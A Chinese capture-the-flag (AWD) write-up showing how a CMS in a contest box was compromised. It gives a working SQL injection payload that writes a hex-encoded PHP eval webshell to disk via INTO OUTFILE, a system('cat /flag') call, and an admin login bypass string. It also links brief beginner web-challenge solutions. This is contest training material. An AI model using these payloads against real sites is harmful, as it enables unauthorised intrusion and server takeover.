Bugku AWD公测赛-2 writeup

harry 2021-02-01 13:56:11 643 0


复现地址: http://81.70.197.140:8080/


本文由官方联合 自由公式战队共同撰写

首先登录ssh,脱一份源码下来。在

/app/includes/other.fun.php可以看到这个cms的具体信息

图片1.png


利用wooyun漏洞库查询历史漏洞

图片2.png


在Seay源代码审计里面找到上传的文件有后缀限制没办法geshell,所以只能看第一个漏洞详情了

图片3.png


可以看到具体的SQL注入写webshell语句,于是改下写入路径exp:

username=admin' and 1=2 UNION SELECT 0x3C3F70687020406576616C28245F504F53545B2741275D293B3F3E,2,3,4,5 into outfile '/app/upload/bannerpic/t.php'#&password=a

并且执行die(system('cat /flag'));输出flag

下图为 自由公式战队的批量getshell提交flag脚本

图片4.png


另外后台存在万能密码登录漏洞

用户名 admin'or'='or' 密码随意

QQ20210201-135430@2x.png

QQ20210201-135539@2x.png

分类:AWD
image
作者:harry

2

提交

0

收入

相关WriteUP

  • web1

    打开题目地址发现一堆滑稽笑脸查看网页源代码得到flag

    • WEB
    • 3月前
  • web2

    打开发现是一个验证码发现只让输入一位数字我们右键单击输入框审查元素把maxlength改成2(2位数)输入验证码即可得到flag

    • WEB
    • 1月前
  • web3

    $what=$_GET['what'];echo$what;if($what=='flag')echo'flag{****}';通过阅读代码得知$what=='flag' 即可得到flag

    • WEB
    • 1月前
  • web4

    $what=$_POST['what'];echo$what;if($what=='flag')echo'flag{****}';通过阅读代码得知$what=='flag' 即可得到flag使用hackbar插件post一个参数即可

    • WEB
    • 1月前
  • web5

    $num=$_GET['num'];if(!is_numeric($num)){echo$num;if($num==1)echo'flag{**********}';}php弱类型比较不能是数字,还要求满足==1,那么在数字1之后加上一个字母即可,例如num=1a,PHP在判断数字相等时,会将字符串转换为数字来比较

    • WEB
    • 1月前